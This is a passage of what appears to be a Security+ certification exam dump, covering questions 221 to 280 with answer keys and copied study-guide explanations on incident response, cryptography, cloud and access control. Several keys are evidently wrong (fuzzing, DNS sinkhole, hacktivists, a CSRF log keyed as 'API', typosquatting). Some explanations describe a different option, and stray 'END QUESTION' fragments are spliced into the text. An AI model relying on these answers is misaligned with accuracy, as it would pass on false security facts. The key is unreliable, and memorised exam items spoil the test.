Upon investigation, a forensics firm wants to know what was in the memory on the compromised server. 
Which of the following files should be given to the forensics firm?

A. Security
B. Application
C. Dump
D. Syslog

Answer: C

END
QUESTION 222
A large industrial system's smart generator monitors the system status and sends alerts to third-party maintenance personnel when critical failures occur. While reviewing the network logs the company's security manager notices the generator's IP is sending packets to an internal file server's IP. Which of the following mitigations would be BEST for the security manager to implement while maintaining alerting capabilities?


A. Segmentation
B. Firewall whitelisting
C. Containment
D. isolation

Answer: B

END
QUESTION 223
A cybersecurity department purchased a new PAM solution. The team is planning to randomize the service account credentials of the Windows server first. Which of the following would be the BEST method to increase the security on the Linux server?

A. Randomize the shared credentials
B. Use only guest accounts to connect.
C. Use SSH keys and remove generic passwords 
D. Remove all user accounts.

Answer: C

END
QUESTION 224
An organization has decided to host its web application and database in the cloud. 
Which of the following BEST describes the security concerns for this decision?

A. Access to the organization's servers could be exposed to other cloud-provider clients 
B. The cloud vendor is a new attack vector within the supply chain
 C. Outsourcing the code development adds risk to the cloud provider 
 D. Vendor support will cease when the hosting platforms reach EOL.

Answer: A

END
QUESTION 225
A user is concerned that a web application will not be able to handle unexpected or random input without crashing. Which of the following BEST describes the type of testing the user should perform?

A. Code signing 
B. Fuzzing
C. Manual code review
D. Dynamic code analysis

Answer: D

END
QUESTION 226
A company needs to centralize its logs to create a baseline and have visibility on its security events. 
Which of the following technologies will accomplish this objective?

A. Security information and event management 
B. A web application firewall
C. A vulnerability scanner 
D. A next-generation firewall

Answer: A

An NGFW performs deep-packet inspection, adding application-level inspection as a core feature. The NGFW is aware of common application protocols used on the Internet, such as FTP and HTTP. By using deep-packet inspection, the NGFW can identify application commands and detect potentially malicious traffic. This allows it to apply content filtering and URL filtering.

END
QUESTION 227
A security administrator currently spends a large amount of time on common security tasks, such as report generation, phishing investigations, and user provisioning and deprovisioning. This prevents the administrator from spending time on other security projects. The business does not have the budget to add more staff members. Which of the following should the administrator implement?

A. DAC 
B. ABAC 
C. SCAP 
D. SOAR

Answer: D

Security Orchestration, Automation, and Response - Automation is the action of scripting a single activity, 
while orchestration is the action of coordinating multiple automations (and possibly manual activity) to perform a complex,
multistep task. In the case of security orchestration, automation, and response (SOAR), this task is principally incident response, though the technologies can also be used for tasks such as threat hunting too. SOAR is designed as a solution 
to the problem of the volume of alerts overwhelming analysts' ability to respond, measured as the mean time to respond 
(MTTR). A SOAR may be implemented as a standalone technology or integrated with a SIEM - often referred to as a next-gen SIEM. The basis of SOAR is to scan the organization's store of security and threat intelligence, analyze it using machine/deep learning techniques, and then use that data to automate and provide data enrichment for the workflows that drive incident response and threat hunting. It can also assist with provisioning tasks, such as creating and deleting user accounts, making shares available, or launching VMs from templates, to try to eliminate configuration errors.

SCAP (Security Content Automation Protocol) A NIST framework that outlines various accepted practices for automating
vulnerability scanning.

ABAC (attribute-based access control) An access control technique that evaluates a set of attributes that each subject possesses to determine if access should be granted.

END
QUESTION 228
An incident response technician collected a mobile device during an investigation. 
Which of the following should the technician do to maintain chain of custody?

A. Document the collection and require a sign-off when possession changes.
B. Lock the device in a safe or other secure location to prevent theft or alteration. 
C. Place the device in a Faraday cage to prevent corruption of the data.
D. Record the collection in a blockchain-protected public ledger.

Answer: A

END
QUESTION 229
A symmetric encryption algorithm Is BEST suited for:

A. key-exchange scalability.
B. protecting large amounts of data. 
C. providing hashing capabilities, 
D. implementing non-repudiation.

Answer: B

Asymmetric Keys – Provide Authentication (Authentication also means non-repudiation)
Symmetric Keys – Provide Confidentiality
Hashing Algorithms – Integrity
Key Exchange – Asymmetric Keys used to securely transport the Symmetric Key to the other Party

END
QUESTION 230
A security analyst is reviewing information regarding recent vulnerabilities. Which of the following will the analyst MOST likely consult to validate which platforms have been affected?

A. OSINT 
B. SIEM 
C. CVSS 
D. CVE

Answer: D

CVE (Common Vulnerabilities and Exposures) Scheme for identifying vulnerabilities developed by MITRE and adopted by NIST.

CVSS (Common Vulnerability Scoring System) A risk management approach to quantifying vulnerability data and then
taking into account the degree of risk to different types of systems or information

Open source intelligence (OSINT) - some companies operate threat intelligence services on an open-source basis, earning income from consultancy rather than directly from the platform or research effort.

END
QUESTION 231
A security analyst needs to produce a document that details how a security incident occurred, the steps that were taken for recovery, and how future incidents can be avoided. During which of the following stages of the response process will this activity take place?

A. Recovery
B. Identification
C. Lessons Learned	
D. Preparation

Answer: C

END
QUESTION 232
Which of the following would be BEST to establish between organizations that have agreed to cooperate and are engaged in early discussion to define the responsibilities of each party, but do not want to establish a contractually binding agreement?

A. SLA 
B. NDA 
C. BPA 
D. MOU

Answer: D

END
QUESTION 233
A Chief Executive Officer's (CEO) personal information was stolen in a social engineering attack. 
Which of the following sources would reveal if the CEO's personal information is for sale?

A. Automated information sharing 
B. Open-source intelligence
C. The dark web
D. Vulnerability databases

Answer: C

END
QUESTION 234
A smart retail business has a local store and a newly established and growing online storefront. A recent storm caused a power outage to the business and the local ISP, resulting in several hours of lost sales and delayed order processing. The business owner now needs to ensure two things:

- Protection from power outages
- Always-available connectivity in case of an outage

The owner has decided to implement battery backups for the computer equipment. 
Which of the following would BEST fulfill the owner's second need?

A. Lease a point-to-point circuit to provide dedicated access. 
B. Connect the business router to its own dedicated UPS.
C. Purchase services from a cloud provider for high availability 
D. Replace the business's wired network with a wireless network.

Answer: C

END
QUESTION 235
Which of the following organizational policies are MOST likely to detect fraud that is being conducted by existing employees? (Select TWO).

A. Offboarding
B. Mandatory vacation 
C. Job rotation
D. Background checks 
E. Separation of duties 
F. Acceptable use

Answer: BC

END
QUESTION 236
Which of the following algorithms has the SMALLEST key size?

A. DES
B. Twofish 
C. RSA
D. AES

Answer: A

Data Encryption Standard (DES) is a symmetric block cipher that was widely used for many years, dating back to the 1970s. It encrypts data in 64-bit blocks. However, it uses a relatively small key of only 56 bits and can be broken with brute force attacks. In the '70s, the technology required to break 56-bit encryption wasn't easily available, but with the advances in computer technology, a 56-bit key is now considered trivial. DES is not recommended for use today.

END
QUESTION 237
A security engineer needs to Implement the following requirements:

- All Layer 2 switches should leverage Active Directory for authentication.
- All Layer 2 switches should use local fallback authentication If Active Directory Is offline. 
- All Layer 2 switches are not the same and are manufactured by several vendors.

Which of the following actions should the engineer take to meet these requirements? (Select TWO).

A. Implement RADIUS.
B. Configure AAA on the switch with local login as secondary.
C. Configure port security on the switch with the secondary login method. 
D. Implement TACACS+
E. Enable the local firewall on the Active Directory server. 
F. Implement a DHCP server.

Answer: AB

Extensible Authentication Protocol/IEEE 802.1X - The smart-card authentication process described earlier is used for Kerberos
authentication where the computer is attached to the local network and the user is logging on to Windows. Authentication may also be required in other contexts:
> When the user is accessing a wireless network and needs to authenticate with the network database.
> When a device is connecting to a network via a switch and network policies require the user to be authenticated before the device is allowed to communicate.

> When the user is connecting to the network over a public network via a virtual private network (VPN).

END
QUESTION 238
Users in an organization have been installing programs from the internet on their workstations without first getting proper authorization. The organization maintains a portal from which users can install standardized programs. However, some users have administrative access on their workstations to enable legacy programs to function properly. Which of the following should the security administrator consider implementing to address this issue?

A. Application code signing 
B. Application whitelisting 
C. Data loss prevention
D. Web application firewalls

Answer: B

END
QUESTION 239
A security analyst needs to determine how an attacker was able to use User3 to gain a foothold within a company's network. The company's lockout policy requires that an account be locked out for a minimum of 15 minutes after three unsuccessful attempts. While reviewing the log files, the analyst discovers the following:

See document question 239.

Which of the following attacks MOST likely occurred?

A. Dictionary
B. Credential-stuffing 
C. Password-spraying 
D. Brute-force

Answer: C

Password spraying is a horizontal brute-force online attack. This means that the attacker chooses one or more common passwords (for example, password or 123456) and tries them in conjunction with multiple usernames.

Password spraying is an attack that attempts to access a large number of accounts (usernames) with a few commonly used passwords. Traditional brute-force attacks attempt to gain unauthorized access to a single account by guessing the password. This can quickly result in the targeted account getting locked-out, as commonly used account-lockout policies allow for a limited number of failed attempts (typically three to five) during a set period of time. During a password-spray attack (also known as the “low-and-slow” method), the malicious actor attempts a single commonly used password (such as ‘Password1' or ‘Summer2017') against many accounts before moving on to attempt a second password, and so on. This technique allows the actor to remain undetected by avoiding rapid or frequent account lockouts.

credential stuffing - Brute force attack in which stolen user accounts and passwords are tested against multiple websites.

Credential stuffing is a type of cyberattack where stolen account credentials typically consisting of lists of usernames and/or email addresses and the corresponding passwords are used to gain unauthorized access to user accounts through large-scale automated login requests directed against a web application. Unlike credential cracking, credential stuffing attacks do not attempt to brute force or guess any passwords – the attacker simply automates the logins for a large number of previously discovered credential pairs using standard web automation tools like Selenium, cURL, PhantomJS or tools designed specifically for these types of attacks such as: Sentry MBA, SNIPR, STORM, Blackbullet and Openbullet.

END
QUESTION 240
Which of the following scenarios BEST describes a risk reduction technique?

A. A security control objective cannot be met through a technical change, so the company purchases insurance and is no longer concerned about losses from data breaches.
B. A security control objective cannot be met through a technical change, so the company implements a policy to train users on a more secure method of operation.
C. A security control objective cannot be met through a technical change, so the company changes its method of operation
D. A security control objective cannot be met through a technical change, so the Chief Information Officer (CIO) decides to sign off on the risk.

Answer: B

Risk reduction refers to controls that can either make a risk incident less likely or less costly (or perhaps both). For example, if fire is a threat, a policy strictly controlling the use of flammable materials on site reduces likelihood while a system of alarms and sprinklers reduces impact by (hopefully) containing any incident to a small area. Another example is offsite data backup, which provides a remediation option in the event of servers being destroyed by fire.

END
QUESTION 241
An end user reports a computer has been acting slower than normal for a few weeks. During an investigation, an analyst determines the system is sending the user's email address and a ten-digit number to an IP address once a day. The only recent log entry regarding the user's computer is the following:

See document question 241.

Which of the following is the MOST likely cause of the issue?

A. The end user purchased and installed a PUP from a web browser 
B. A bot on the computer is brute forcing passwords against a website 
C. A hacker is attempting to exfiltrate sensitive data
D. Ransomware is communicating with a command-and-control server.

Answer: A

Potentially unwanted programs (PUPs)/Potentially unwanted applications (PUAs) - software installed alongside a package selected by the user or perhaps bundled with a new computer system. 
Unlike a Trojan, the presence of a PUP is not automatically regarded as malicious. 
It may have been installed without active consent or consent from a purposefully confusing license agreement. 
This type of software is sometimes described as grayware rather than malware. 

END
QUESTION 242
Which of the following scenarios would make a DNS sinkhole effective in thwarting an attack?

A. An attacker is sniffing traffic to port 53, and the server is managed using unencrypted usernames and passwords.
B. An organization is experiencing excessive traffic on port 53 and suspects an attacker is trying to DoS the domain name server.
C. Malware trying to resolve an unregistered domain name to determine if it is running in an isolated sandbox
D. Routing tables have been compromised, and an attacker is rerouting traffic to malicious websites

Answer: D

Using a DNS sinkhole to route suspect traffic to a different network, such as a honeynet, where it can be analyzed.

END
QUESTION 243
A security analyst reviews the datacenter access logs for a fingerprint scanner and notices an abundance of errors that correlate with users' reports of issues accessing the facility. Which of the following is MOST likely the cause of the access issues?

A. False rejection
B. Cross-over error rate 
C. Efficacy rate
D. Attestation

Answer: A

END
QUESTION 244
A company's Chief Information Security Officer (CISO) recently warned the security manager that the company's Chief Executive Officer (CEO) is planning to publish a controversial opinion article in a national newspaper, which may result in new cyberattacks. Which of the following would be BEST for the security manager to use in a threat mode?

A. Hacktivists
B. White-hat hackers 
C. Script kiddies
D. Insider threats

Answer: B

END
QUESTION 245
When used at the design stage, which of the following improves the efficiency, accuracy, and speed of a database?

A. Tokenization 
B. Data masking 
C. Normalization 
D. Obfuscation

Answer: C

Normalization - Where an application accepts string input, the input should be subjected to normalization procedures before being accepted. Normalization means that a string is stripped of illegal characters or substrings and converted to the accepted character set. This ensures that the string is in a format that can be processed correctly by the input validation routines.
When user-generated strings are passed through different contexts in a web application - between HTTP, JavaScript, PHP, and SQL for instance - each with potentially different canonicalization schemes, it is extremely difficult to ensure that characters that would facilitate script injection by XSS have been rendered safe. 

In computer science, canonicalization (sometimes standardization or normalization) is a process for converting data that has more than one possible representation into a "standard", "normal", or canonical form. This can be done to compare different representations for equivalence, to count the number of distinct data structures, to improve the efficiency of various algorithms by eliminating repeated calculations, or to make it possible to impose a meaningful sorting order.

data masking A deidentification method where generic or placeholder labels are substituted for real data while preserving
the structure or format of the original data.

END
QUESTION 246
An analyst needs to set up a method for securely transferring files between systems. One of the requirements is to authenticate the IP header and the payload. Which of the following services would BEST meet the criteria?

A. TLS 
B. PFS 
C. ESP 
D. AH

Answer: C

END
QUESTION 247
A company has determined that if its computer-based manufacturing is not functioning for 12 consecutive hours, it will lose more money that it costs to maintain the equipment. Which of the following must be less than 12 hours to maintain a positive total cost of ownership?

A. MTBF 
B. RPO 
C. RTO 
D. MTTR

Answer: D

END
QUESTION 248
Which of the following control sets should a well-written BCP include? (Select THREE)

A. Preventive 
B. Detective 
C. Deterrent 
D. Corrective
E. Compensating 
F. Physical
G. Recovery

Answer: BDG

END
QUESTION 249
The manager who is responsible for a data set has asked a security engineer to apply encryption to the data on a hard disk. The security engineer is an example of a:

A. data controller
B. data owner
C. data custodian. 
D. data processor

Answer: C

> Data custodian - this role handles managing the system on which the data assets are stored. This includes responsibility for enforcing access control, encryption, and backup/recovery measures.

END
QUESTION 250
Which of the following disaster recovery tests is The LEAST time-consuming for the disaster recovery team?

A. Tabletop 
B. Parallel
C. Full interruption 
D. Simulation (Functional Exercise)

Answer: A

Functional Recovery Plans
Because disasters are extreme and (hopefully) rare events, it is very difficult to evaluate how effective or functional a recovery plan is. There are four principal methods for assessing the functionality of recovery plans:

> Walk-throughs, workshops, and orientation seminars - often used to provide basic awareness and training for disaster recovery team members, these exercises describe the contents of DRPs, and other plans, and the roles and responsibilities outlined in those plans.

> Tabletop exercises - staff "ghost" the same procedures as they would in a disaster, without actually creating disaster conditions or applying or changing anything. These are simple to set up but do not provide any sort of practical evidence of things that could go wrong, time to complete, and so on.

> Functional exercises - action-based sessions where employees can validate DRPs by performing scenario-based activities in a simulated environment. 

> Full-scale exercises - action-based sessions that reflect real situations, these exercises are held onsite and use real equipment and real personnel as much as possible. Full-scale exercises are often conducted by public agencies, but local organizations might be asked to participate.

END
QUESTION 251
Some laptops recently went missing from a locked storage area that is protected by keyless RFID-enabled locks. There is no obvious damage to the physical space. The security manager identifies who unlocked the door, however, human resources confirms' the employee was on vacation at the time of the incident. Which of the following describes what MOST likely occurred?

A. The employee's physical access card was cloned. 
B. The employee is colluding with human resources
C. The employee's biometrics were harvested
D. A criminal used lock picking tools to open the door.

Answer: A

END
QUESTION 252
Which of the following would be the BEST resource for a software developer who is looking to improve secure coding practices for web applications?

A. OWASP
B. Vulnerability scan results 
C. NIST CSF
D. Third-party libraries

Answer: A

The Open Web Application Security Project (OWASP) is a not-for-profit, online community that publishes several secure application development resources, such as the Top 10 list of the most critical application security risks (owasp.org/www-project-top-ten). OWASP has also developed resources, such as the Zed Attack Proxy and Juice Shop (a deliberately unsecure web application), to help investigate and understand penetration testing and application security issues.

END
QUESTION 253
A security analyst is reviewing logs on a server and observes the following output:

01/01/2020 03:33:23 admin attempted login with password sneak
01/01/2020 03:33:23 admin attempted login with password sneaked
01/01/2020 03:33:23 admin attempted login with password sneaker
01/01/2020 03:33:23 admin attempted login with password sneer
01/01/2020 03:33:23 admin attempted login with password sneeze
01/01/2020 03:33:23 admin attempted login with password sneezy

Which of the following is the security analyst observing?

A. A rainbow table attack
B. A password-spraying attack 
C. A dictionary attack
D. A keylogger attack

Answer: C

END
QUESTION 254
A security analyst needs to make a recommendation for restricting access to certain segments of the network using only data-link layer security. Which of the following controls will the analyst MOST likely recommend?

A. MAC 
B. ACL 
C. BPDU 
D. ARP

Answer: A

END
QUESTION 255
An organization routes all of its traffic through a VPN. Most users are remote and connect into a corporate datacenter that houses confidential information. There is a firewall at the Internet border followed by a DLP appliance, the VPN server and the datacenter itself. Which of the following is the WEAKEST design element?

A. The DLP appliance should be integrated into a NGFW.
B. Split-tunnel connections can negatively impact the DLP appliance's performance 
C. Encrypted VPN traffic will not be inspected when entering or leaving the network 
D. Adding two hops in the VPN tunnel may slow down remote connections

Answer: C

END
QUESTION 256
Which of the following are requirements that must be configured for PCI DSS compliance? (Select TWO).

A. Testing security systems and processes regularly
B. Installing and maintaining a web proxy to protect cardholder data 
C. Assigning a unique ID to each person with computer access
D. Encrypting transmission of cardholder data across private networks
E. Benchmarking security awareness training for contractors 
F. Using vendor-supplied default passwords for system passwords

Answer: AC

No matter where you are in your PCI compliance journey, you'll need a reference to help you get headed in the right direction. 
We hope this article will serve as your “jumping off point” as you start to address the 12 requirements of the PCI DSS:
1.	Protect your system with firewalls
2.	Configure passwords and settings 
3.	Protect stored cardholder data
4.	Encrypt transmission of cardholder data across open, public networks
5.	Use and regularly update anti-virus software
6.	Regularly update and patch systems
7.	Restrict access to cardholder data to business need to know
8.	Assign a unique ID to each person with computer access
9.	Restrict physical access to workplace and cardholder data
10.	Implement logging and log management 
11.	Conduct vulnerability scans and penetration tests
12.	Documentation and risk assessments
END
QUESTION 257
A network technician is installing a guest wireless network at a coffee shop. When a customer purchases an Item, the password for the wireless network is printed on the receipt so the customer can log in. Which of the following will the technician MOST likely configure to provide the highest level of security with the least amount of overhead?

A. WPA2-EAP 
B. WEP-TKIP 
C. WPA2-PSK 
D. WPS-PIN

Answer: C

WEP & WPA used TKIP. WPA2 uses AES.

END
QUESTION 258
A security engineer needs to implement an MDM solution that complies with the corporate mobile device policy. The policy states that for mobile users to access corporate resources on their devices the following requirements must be met:

- Mobile device OSs must be patched up to the latest release 
- A screen lock must be enabled (passcode or biometric)
- Corporate data must be removed if the device is reported lost or stolen

Which of the following controls should the security engineer configure? (Select TWO)

A. Containerization
B. Storage segmentation 
C. Posturing
D. Remote wipe
E. Full-device encryption 
F. Geofencing

Answer: AD

Containerization allows the employer to manage and maintain the portion of the device that interfaces with the corporate network. An enterprise workspace with a defined selection of apps and a separate container is created. This container isolates
corporate apps from the rest of the device. There may be a requirement for additional authentication to access the workspace.
The container can also enforce storage segmentation. With storage segmentation the container is associated with a directory on the persistent storage device that is not readable or writable by apps that are not in the container. Conversely, apps cannot
write to areas outside the container, such as external media or using copy and paste to a non-container app. App network access might be restricted to a VPN tunneled through the organization's security system.

END
QUESTION 259
Which of the following would BEST identify and remediate a data-loss event in an enterprise using third-party, web-based services and file-sharing platforms?

A. SIEM 
B. CASB 
C. UTM 
D. DLP

Answer: D

Data loss prevention (DLP) products automate the discovery and classification of data types and enforce rules so that data is not viewed or transferred without a proper authorization. Such solutions will usually consist of the following components:

> Policy server - to configure classification, confidentiality, and privacy rules and policies, log incidents, and compile reports.

> Endpoint agents - to enforce policy on client computers, even when they are not connected to the network.

> Network agents - to scan communications at network borders and interface with web and messaging servers to enforce policy.

END
QUESTION 260
A forensics examiner is attempting to dump passwords cached in the physical memory of a live system but keeps receiving an error message. Which of the following BEST describes the cause of the error?

A. The examiner does not have administrative privileges to the system 
B. The system must be taken offline before a snapshot can be created 
C. Checksum mismatches are invalidating the disk image
D. The swap file needs to be unlocked before it can be accessed

Answer: A

END
QUESTION 261
To reduce costs and overhead, an organization wants to move from an on-premises email solution to a cloud-based email solution. At this time, no other services will be moving. Which of the following cloud models would BEST meet the needs of the organization?

A. MaaS 
B. laaS 
C. SaaS 
D. PaaS

Answer: C

Software as a service (SaaS) is a different model of provisioning software applications. Rather than purchasing software licenses for a given number of seats, a business would access software hosted on a supplier's servers on a pay-as-you go or lease arrangement (on-demand). Virtual infrastructure allows developers to provision on-demand applications much more quickly than previously. The applications can be developed and tested in the cloud without the need to test and deploy on client computers. Examples include Microsoft Office 365 (microsoft.com/en-us/microsoft-365/enterprise), Salesforce (salesforce.com), and Google G Suite (gsuite.google.com).

Office 365 is a line of subscription services offered by Microsoft as part of the Microsoft Office product line. The brand encompasses plans that allow use of the Microsoft Office software suite over the life of the subscription, as well as cloud-based SaaS products for business environments, such as hosted Exchange Server, Skype for Business Server, and SharePoint, among others.

END
QUESTION 262
A security manager for a retailer needs to reduce the scope of a project to comply with PCI DSS. The PCI data is located in different offices than where credit cards are accepted. All the offices are connected via MPLS back to the primary datacenter. Which of the following should the security manager implement to achieve the objective?

A. Segmentation 
B. Containment 
C. Geofencing 
D. Isolation

Answer: A

END
QUESTION 263
A company is launching a new internet platform for its clients. The company does not want to implement its own authorization solution but instead wants to rely on the authorization provided by another platform. Which of the following is the BEST approach to implement the desired solution?

A. OAuth
B. TACACS+ 
C. SAML
D. RADIUS

Answer: A

SAML uses a Federated Identity Access Management system, however the resource Federation server 
(The company launching the new internet platform) still retains control over authorization to the resources. 
Clients also suggests they are not from one particular Domain or environment.

END
QUESTION 264
The facilities supervisor for a government agency is concerned about unauthorized access to environmental systems in the event the staff WiFi network is breached. Which of the following would BEST address this security concern?

A. install a smart meter on the staff WiFi.
B. Place the environmental systems in the same DHCP scope as the staff WiFi. 
C. Implement Zigbee on the staff WiFi access points.
D. Segment the staff WiFi network from the environmental systems network.

Answer: D

ZigBee Low-power wireless communications open source protocol used primarily for home automation. ZigBee uses radio frequencies in the 2.4 GHz band and a mesh topology.

A smart meter provides continually updating reports of electricity, gas, or water usage to the supplier, reducing the need for manual inspections. Most meters use cellular data for communication back to the supplier, and an IoT protocol, such as ZigBee, for integration with smart appliances.

END
QUESTION 265
A security analyst is reviewing the output of a web server log and notices a particular account is attempting to transfer large amounts of money:

GET http://yourbank.com/transfer.do?acctnum=087646958&amount=500000 HTTP/1.1
GET http://yourbank.com/transfer.do?acctnum=087646958&amount=5000000 HTTP/1.1
GET http://yourbank.com/transfer.do?acctnum=087646958&amount=1000000 HTTP/1.1
GET http://yourbank.com/transfer.do?acctnum=087646958&amount=500 HTTP/1.1

Which of the following types of attack is MOST likely being conducted?

A. SQLi
B. CSRF
C. Session replay 
D. API

Answer: D

Session replay is the ability to replay a visitor's journey on a web site or within a mobile application or web application. Replay can include the user's view (browser or screen output), user input (keyboard and mouse inputs), and logs of network events or console logs. Session replay is supposed to help improve customer experience[1] and help identify obstacles in conversion processes on websites. However, it can also be used to study a website's usability, customer behavior, and the handling of customer service END
QUESTIONs as the customer journey, with all interactions, can be replayed. Some organizations also use this capability to analyze fraudulent behavior on websites.
There are many tag-based solutions that offer video-like replay of a visitor's session. While replay is analogous to video, it is more accurately a reproduction of a specific user's experience detailing mouse movements, clicks, taps, and scrolls. The underlying data for the session recordings is captured by tagging pages. 

SQL Injection (SQLi) is a type of an injection attack that makes it possible to execute malicious SQL statements. These statements control a database server behind a web application. Attackers can use SQL Injection vulnerabilities to bypass application security measures. They can go around authentication and authorization of a web page or web application and retrieve the content of the entire SQL database. 

END
QUESTION 266
A security analyst is logged into a Windows file server and needs to see who is accessing files and from which computers.
Which of the following tools should the analyst use?

A. netstat 
B. net share 
C. netcat
D. nbtstat
E. net session

Answer: E

Net session | Microsoft Docs
Use net session to view the computer names and user names of users on a server, to see if users have files open, 
and to see how long each user's session has been idle.
The information appears in a format similar to the following:
Computer        User name        Client type    Opens    Idle time
------------------------ ------------------------------------------------
\\BWESTON       CHRISDR          Windows 7       1       00:00:13
\\JAMESMC-01    Administrator    Windows Vista   0       01:05:13

END
QUESTION 267
After consulting with the Chief Risk Officer (CRO). A manager decides to acquire cybersecurity insurance for the company. Which of the following risk management strategies is the manager adopting?

A. Risk acceptance 
B. Risk avoidance 
C. Risk transference 
D. Risk mitigation

Answer: C

END
QUESTION 268
A company is designing the layout of a new datacenter so it will have an optimal environmental temperature.
Which of the following must be included? (Select TWO)

A. An air gap 
B. A cold aisle
C. Removable doors 
D. A hot aisle
E. An loT thermostat 
F. A humidity monitor

Answer: BD 

Hot and Cold aisles are for Servers

END
QUESTION 269
A company has decided to move its operations to the cloud. It wants to utilize technology that will prevent users from downloading company applications for personal use, restrict data that is uploaded, and have visibility into which applications are being used across the company. Which of the following solutions will BEST meet these requirements?

A. An NGFW 
B. A CASB
C. Application whitelisting 
D. An NG-SWG

Answer: D

Next-Generation Secure Web Gateway - Enterprise networks often make use of secure web gateways (SWG). An on-premises
SWG is a proxy-based firewall, content filter, and intrusion detection/prevention system that mediates user access to Internet sites and services. A next-generation SWG combines the functionality of an SWG with that of data loss prevention (DLP) and a CASB to provide a wholly cloud-hosted platform for client access to websites and cloud apps. 

A cloud access security broker (CASB) is enterprise management software designed to mediate access to cloud services by users across all types of devices. CASB vendors include Blue Coat, now owned by Symantec, SkyHigh Networks, now
owned by MacAfee, Forcepoint, Microsoft Cloud App Security and Cisco Cloudlock.

END
QUESTION 270
A security analyst is investigating an incident to determine what an attacker was able to do on a compromised laptop. The analyst reviews the following SIEM log:

See document question 270 for image.

Which of the following describes the method that was used to compromise the laptop?

A. An attacker was able to move laterally from PC1 to PC2 using a pass-the-hash attack
B. An attacker was able to bypass application whitelisting by emailing a spreadsheet attachment with an embedded PowerShell in the file
C. An attacker was able to install malware to the C:\asdf234 folder and use it to gain administrator nights and launch Outlook
D. An attacker was able to phish user credentials successfully from an Outlook user profile

Answer: B

END
QUESTION 271
An attacker is exploiting a vulnerability that does not have a patch available. 
Which of the following is the attacker exploiting?

A. Zero-day
B. Default permissions 
C. Weak encryptions
D. Unsecure root accounts

Answer: A

END
QUESTION 272
An attacker has successfully exfiltrated several non-salted password hashes from an online system.
Given the logs below:

Session			: hascat
Status			: cracked
Hash.Type		: MD5
Hash.Target		: b3b81d1b7a412bf5aab3a507d0a586a0
Time.Started	: Fri Mar 10 10:18:45 2020
Recovered		: 1/1 (100%) Digests
Progress		: 28756845 / 450365879 (6.38%) hashes
Time.Stopped	: Fri Mar 10 10:20:12 2020
Password found	: Th3B3stP@55w0rd!

Which of the following BEST describes the type of password attack the attacker is performing?

A. Dictionary
B. Pass-the-hash 
C. Brute-force
D. Password spraying

Answer: C

start [hashcat wiki]

END
QUESTION 273
A company is upgrading its wireless infrastructure to WPA2-Enterprise using EAP-TLS. 
Which of the following must be part of the security architecture to achieve AAA? (Select TWO)

A. DNSSEC
B. Reverse proxy
C. VPN concentrator 
D. PKI
E. Active Directory 
F. RADIUS

Answer: DF

Introduction to Radius
Radius is a server for remote user authentication and accounting. Its primary use is for Internet Service Providers, though it may as well be used on any network that needs a centralized authentication and/or accounting service for its workstation
PIX, TACACS+, and RADIUS Sample Configurations: 4.2.x - Cisco

END
QUESTION 274
Which of the following environments minimizes end-user disruption and is MOST likely to be used to assess the impacts of any database migrations or major system changes by using the final version of the code?

A. Staging 
B. Test
C. Production 
D. Development

Answer: A

To meet the demands of the life cycle model and quality assurance, code is normally passed through several different environments:

> Development - the code will be hosted on a secure server. Each developer will check out a portion of code for editing on his or her local machine. The local machine will normally be configured with a sandbox for local testing. This ensures that whatever
other processes are being run locally do not interfere with or compromise the application being developed.

> Test/integration - in this environment, code from multiple developers is merged to a single master copy and subjected to basic unit and functional tests (either automated or by human testers). These tests aim to ensure that the code builds correctly and fulfills the functions required by the design.

> Staging - this is a mirror of the production environment but may use test or sample data and will have additional access controls so that it is only accessible to test users. Testing at this stage will focus more on usability and performance.

> Production - the application is released to end users.

END
QUESTION 275
An information security incident recently occurred at an organization, and the organization was required to report the incident to authorities and notify the affected parties. When the organization's customers became aware of the incident, some reduced their orders or stopped placing orders entirely. Which of the following is the organization experiencing?

A. Reputation damage 
B. Identity theft
C. Anonymization
D. Interrupted supply chain

Answer: A

END
QUESTION 276
An attacker is attempting to exploit users by creating a fake website with the user's URL. Which of the following social-engineering attacks does this describe?

A. Information elicitation 
B. Typo squatting
C. Impersonation
D. Watering-hole attack

Answer: C

What is elicitation? This strange word means using techniques to gather information or knowledge about people. 
Elicitation is nothing more than a technique used to acquire information discretely, without the other person knowing. 
In order to obtain it without arousing suspicion or the person realizing what you're doing, you cannot ask them directly. 
The subjects of elicitation may never realize they gave away important information.

Watering hole attack - Watering hole is a computer attack strategy in which an attacker guesses or observes which websites 
an organization often uses and infects one or more of them with malware. Eventually, some member of the targeted group will become infected. Hacks looking for specific information may only attack users coming from a specific IP address. 
This also makes the hacks harder to detect and research. The name is derived from predators in the natural world, 
who wait for an opportunity to attack their prey near watering holes.

END
QUESTION 277
Following a prolonged datacenter outage that affected web-based sales a company has decided to move its operations to a private cloud solution. The security team has received the following requirements:

- There must be visibility into how teams are using cloud-based services.
- The company must be able to identify when data related to payment cards is being sent to the cloud.
- Data must be available regardless of the end user's geographic location
- Administrators need a single pane-of-glass view into traffic and trends.

Which of the following should the security analyst recommend?

A. Create firewall rules to restrict traffic to other cloud service providers. 
B. Install a DLP solution to monitor data in transit.
C. Implement a CASB solution.
D. Configure a web-based content filter.

Answer: C

A Cloud access security broker, or CASB, is cloud-hosted software or on-premises software or hardware that act as an intermediary between users and cloud service providers. The ability of a CASB to address gaps in security extends across software-as-a-service (SaaS), platform-as-a-service (PaaS), and infrastructure-as-a-service (IaaS) environments. In addition to providing visibility, a CASB also allows organizations to extend the reach of their security policies from their existing on-premises infrastructure to the cloud and create new policies for cloud-specific context.

END
QUESTION 278
A security engineer has enabled two-factor authentication on all workstations. Which of the following approaches are the MOST secure? (Select TWO).

A. Password and security END
QUESTION 
B. Password and CAPTCHA
C. Password and smart card 
D. Password and fingerprint
E. Password and one-time token 
F. Password and voice

Answer: CE

END
QUESTION 279
A large enterprise has moved all its data to the cloud behind strong authentication and encryption.
A sales director recently had a laptop stolen and later, enterprise data was found to have been compromised. 
Which of the following was the MOST likely cause?

A. Shadow IT
B. Credential stuffing 
C. SQL injection
D. Man-in-the-browser 
E. Bluejacking

Answer: A

Credential stuffing is a type of cyberattack where stolen account credentials typically consisting of lists of usernames and/or email addresses and the corresponding passwords are used to gain unauthorized access to user accounts through large-scale automated login requests directed against a web application.

END
QUESTION 280
During a routine scan of a wireless segment at a retail company, a security administrator discovers several devices are connected to the network that do not match the company's naming convention and are not in the asset inventory. 
WiFi access is protected with 256-bit encryption via WPA2. 
Physical access to the company's facility requires two-factor authentication using a badge and a passcode.
Which of the following should the administrator implement to find and remediate the Issue? (Select TWO).

A. Check the SIEM for failed logins to the LDAP directory.
B. Enable MAC filtering on the switches that support the wireless network. 
C. Run a vulnerability scan on all the devices in the wireless network
